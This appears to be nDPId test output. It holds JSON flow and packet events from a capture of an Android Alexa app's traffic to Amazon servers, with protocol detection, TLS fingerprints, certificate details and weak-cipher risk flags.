-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1490976044439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044439,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8t7dAAEAGjzesECrYNF7ohsG1AFD+AvgcAAAAAKAC\/\/9LawAAAgQFtAQCCAoA9k+rAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044488,"flow_last_seen":1490976044488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044488,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1490976044488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044488,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8GDVAAEAGLrqsECrYNF7ohrJsAbtUI1eFAAAAAKAC\/\/+juwAAAgQFtAQCCAoA9k+wAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044502,"flow_last_seen":1490976044502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1490976044502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044502,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807lAAEAGczWsECrYNF7ohrJtAbvCg5wLAAAAAKAC\/\/\/w0QAAAgQFtAQCCAoA9k+yAAAAAAEDAwg="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044509,"flow_last_seen":1490976044509,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044509,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1490976044509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044509,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dBBAAEAG0t6sECrYNF7ohrJuAbv0jjuiAAAAAKAC\/\/8fLwAAAgQFtAQCCAoA9k+yAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044521,"flow_last_seen":1490976044521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044521,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1490976044521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044521,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pBJAAEAGotysECrYNF7ohrJvAbuLWOumAAAAAKAC\/\/\/YXQAAAgQFtAQCCAoA9k+0AAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1490976044548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjz9AAOcGELs0XuiGrBAq2ABQwbWwdDtt\/gL4HXASH\/7MNQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1490976044550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044550,"pkt":"AMDKkaPvePiC0\/vCCABFAAAot7hAAEAGj0qsECrYNF7ohsG1AFD+AvgdsHQ7blAQAVcWpwAA"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw+cBAAOcGpjk0XuiGrBAq2AG7smyRBTVcVCNXhnASH\/5KCwAAAgQFtAEDAwY="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOIdAAOcGZ3M0XuiGrBAq2AG7sm0P1nENwoOcDHASH\/7coQAAAgQFtAEDAwY="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0BdAAOcGz+I0XuiGrBAq2AG7sm67yvGb9I47o3ASH\/7eewAAAgQFtAEDAwY="} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIDxAAOcGf740XuiGrBAq2AG7sm+mtiDui1jrp3ASH\/59bgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1490976044587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044587,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoGDZAAEAGLs2sECrYNF7ohrJsAbtUI1eGkQU1XVAQAVeUfAAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07pAAEAGc0isECrYNF7ohrJtAbvCg5wMD9ZxDlAQAVcnEwAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodBFAAEAG0vGsECrYNF7ohrJuAbv0jjuju8rxnFAQAVco7QAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1490976044589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044589,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopBNAAEAGou+sECrYNF7ohrJvAbuLWOunprYg71AQAVfH3wAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1490976044679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044679,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzRAAEAGfuWsECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9isAAAAgQFtAQCCAoA9k\/EAAAAAAEDAwg="} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":486,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044502,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":489,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044488,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":491,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976044521,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":495,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044509,"flow_last_seen":1490976044687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2075,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976043814,"flow_last_seen":1490976044708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4995,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1490976044708,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976046418,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976046418,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976046418,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dehAAEAG0QasECrYNF7ohrJwAbub2CWZAAAAAKAC\/\/+NLQAAAgQFtAQCCAoA9lBxAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1490976046475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976046475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWCFAAOcGR9k0XuiGrBAq2AG7snCFN7lwm9glmnASH\/679wAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1490976046478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976046478,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodelAAEAG0RmsECrYNF7ohrJwAbub2CWahTe5cVAQAVcGaQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976046418,"flow_last_seen":1490976046478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976046478,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":605,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976046418,"flow_last_seen":1490976046847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976046847,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047014,"flow_last_seen":1490976047014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047014,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1490976047014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047014,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JC1AAEAG7\/2sECrYNu8YuoTxAbsotHSAAAAAAKAC\/\/+r6QAAAgQFtAQCCAoA9lCtAAAAAAEDAwg="} 
